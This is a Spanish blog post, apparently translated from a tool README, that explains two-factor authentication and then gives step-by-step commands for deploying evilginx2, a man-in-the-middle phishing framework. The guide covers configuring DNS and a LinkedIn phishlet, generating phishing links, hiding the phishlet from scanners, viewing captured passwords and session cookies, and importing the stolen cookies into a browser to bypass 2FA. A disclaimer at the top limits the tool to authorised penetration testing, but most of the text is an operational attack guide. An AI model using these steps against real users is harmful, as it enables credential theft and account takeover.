miércoles, 17 de octubre de 2018

¿Qué tan segura es la autenticación de dos factores? - Evilginx ( MITM )




Link de descarga

https://github.com/kgretzky/evilginx2

ESTE VIDEO ES PARA PROPÓSITO EDUCATIVO SOLO HACKISON NO ES RESPONSABLE DE NINGUNA ACTIVIDAD ILEGAL.
================================================== ====
Soy muy consciente de que Evilginx se puede utilizar para propósitos nefarios. Este trabajo es simplemente una demostración de lo que pueden hacer los adeptos a los atacantes. Es responsabilidad del defensor tomar en consideración dichos ataques y encontrar formas de proteger a sus usuarios contra este tipo de ataques de phishing. Evilginx se debe utilizar solo en tareas de pruebas de penetración legítimas con permiso por escrito de las partes a las que se les puede hacer phishing.
================================================== ====
¿QUÉ ES LA AUTENTICACIÓN DE DOS FACTORES?
La autenticación de dos factores (2FA), a veces conocida como verificación de dos pasos o autenticación de doble factor, es un proceso de seguridad en el que el usuario proporciona dos factores de autenticación diferentes para verificar su identidad y proteger mejor las credenciales del usuario y los recursos que puede proporcionar. acceso. La autenticación de dos factores proporciona un nivel más alto de seguridad que los métodos de autenticación que dependen de la autenticación de un solo factor (SFA), en la que el usuario proporciona solo un factor: por lo general, una contraseña o un código de acceso. Los métodos de autenticación de dos factores dependen de que los usuarios proporcionen una contraseña y un segundo factor, generalmente un token de seguridad o un factor biométrico como una huella dactilar o un escaneo facial.
================================================== ====
¿QUÉ ES EVILGINX?
evilginx2 es un marco de ataque de hombre en medio utilizado para las credenciales de inicio de sesión de phishing junto con las cookies de sesión, que a su vez permite eludir la protección de autenticación de 2 factores.

Esta herramienta es la sucesora de Evilginx, lanzada en 2017, que usó una versión personalizada del servidor HTTP nginx para proporcionar una funcionalidad de hombre en el medio para actuar como un proxy entre un navegador y un sitio web de phishing. La versión actual está completamente escrita en GO como una aplicación independiente, que implementa sus propios servidores HTTP y DNS, lo que hace que sea extremadamente fácil de configurar y usar.
================================================== ====
Puede usar un paquetebinario precompilado para su arquitectura o puede compilar evilginx2 desde la fuente.
Necesitará un servidor externo donde hospedará su instalación de evilginx2 . Personalmente recomiendo Digital Ocean y si sigue mi enlace de referencia, obtendrá$ 10 adicionales para gastar en servidores de forma gratuita .
Evilginx funciona muy bien en el VPS de Debian 8 más básico.
Instalación desde la fuente
Para compilar desde la fuente, asegúrese de haber instalado GO de la versión al menos 1.10.0 ( obténgala desde aquí ) y que la variable de entorno $GOPATH esté configurada correctamente (def. $HOME/go ).
Después de la instalación, agregue esto a su ~/.profile , Asumiendo que instaló GO en /usr/local/go :
 export GOPATH=$HOME/go export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Luego cárguelo con la source ~/.profiles .
Ahora debería estar listo para instalar evilginx2 . Siga estas instrucciones:
 sudo apt-get install git make go get -u github.com/kgretzky/evilginx2 cd $GOPATH/src/github.com/kgretzky/evilginx2 make
Ahora puede ejecutar evilginx2 desde el directorio local como:
 sudo ./bin/evilginx -p ./phishlets/
O instálalo globalmente:
 sudo make install sudo evilginx
Las instrucciones anteriores también se pueden usar para actualizar evilginx2 a la última versión.
Instalación con Docker
Puedes lanzar evilginx2 desde Docker. Primero construye el contenedor:
 docker build . -t evilginx2
A continuación, puede ejecutar el contenedor:
 docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2
Los phishlets se cargan dentro del contenedor en /app/phishlets , que se pueden montar como un volumen para la configuración.
Instalación desde paquetes binarios precompilados
Toma el paquete que quieras desde aquí y déjalo en tu caja. Entonces hazlo:
 unzip <package_name>.zip -d <package_name> cd <package_name>
Si desea realizar una instalación en todo el sistema, use el script de instalación con privilegios de raíz:
 chmod 700 ./install.sh sudo ./install.sh sudo evilginx
o simplemente inicie evilginx2 desde el directorio actual (también necesitará privilegios de root):
 chmod 700 ./evilginx sudo ./evilginx
Uso
¡IMPORTANTE! Asegúrese de que no hay servicio escuchando en los puertos TCP 443 , TCP 80 y UDP 53 . Es posible que deba apagar apache o nginx y cualquier servicio utilizado para resolver el DNS que se esté ejecutando. evilginx2 le dirá en el lanzamiento si no puede abrir un socket de escucha en cualquiera de estos puertos.
Por defecto, evilginx2 buscará phishlets en el directorio ./phishlets/ y más adelante en /usr/share/evilginx/phishlets/ . Si desea especificar una ruta personalizada para cargar phishlets, use el parámetro -p <phishlets_dir_path> al iniciar la herramienta.
 Usage of ./evilginx: -debug Enable debug output -developer Enable developer mode (generates self-signed certificates for all hostnames) -p string Phishlets directory path
Debería ver el logotipo de evilginx2 con un mensaje para ingresar comandos. Escriba help o help <command> si desea ver los comandos disponibles o información más detallada sobre ellos.

Empezando

Para ponerse en marcha, primero debe hacer algo de configuración.
En este punto, asumo que ya ha registrado un dominio (llamémoslo yourdomain.com ) y configura los servidores de nombres ( ns1 y ns2 ) en el panel de administración de su proveedor de dominio para que apunte a la IP de su servidor (por ejemplo, 10.0.0.1 ):
 ns1.yourdomain.com = 10.0.0.1 ns2.yourdomain.com = 10.0.0.1 
Configure el dominio de su servidor y la IP usando los siguientes comandos:
 config domain yourdomain.com config ip 10.0.0.1 
Ahora puedes configurar el phishlet que quieras usar. Por el bien de esta breve guía, usaremos un phishlet de LinkedIn. Configure el nombre de host para el phishlet (obviamente debe contener su dominio):
 phishlets hostname linkedin my.phishing.hostname.yourdomain.com 
Y ahora puede enable el phishlet, que iniciará la recuperación automática de los certificados LetsEncrypt SSL / TLS si no se encuentra ninguno localmente para el nombre de host que eligió:
 phishlets enable linkedin 
Su sitio de phishing ahora está en vivo. Piense en la URL, desea que la víctima sea redirigida al iniciar sesión correctamente y obtenga la URL de phishing como esta (la víctima será redirigida a https://www.google.com ):
 phishlets get-url linkedin https://www.google.com 
La ejecución de phishlets solo responderá a los enlaces con token, por lo que cualquier escáner que escanee su dominio principal será redirigido a la URL especificada como redirect_url en la config . Si desea ocultar su phishlet y hacer que no responda incluso a las URL de phishing en phishlet hide/unhide <phishlet> válidas, use el phishlet hide/unhide <phishlet> .
Puede monitorear las credenciales capturadas y las cookies de sesión con:
 sessions 
Para obtener información detallada sobre la sesión capturada, con la cookie de sesión en sí (se imprimirá en formato JSON en la parte inferior), seleccione su ID de sesión:
 sessions <id> 
La cookie de sesión capturada se puede copiar e importar en el navegador Chrome, usando la extensión EditThisCookie .
¡Importante! Si desea que evilginx2 continúe ejecutándose después de cerrar sesión en su servidor, debe ejecutarlo dentro de una sesión de screen .


Si desea obtener más información sobre esta técnica de phishing, ahi se tiene una extensa publicación sobre evilginx2:

https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/


Videos Exlicativos de su funcionamiento. 








No hay comentarios.:

Publicar un comentario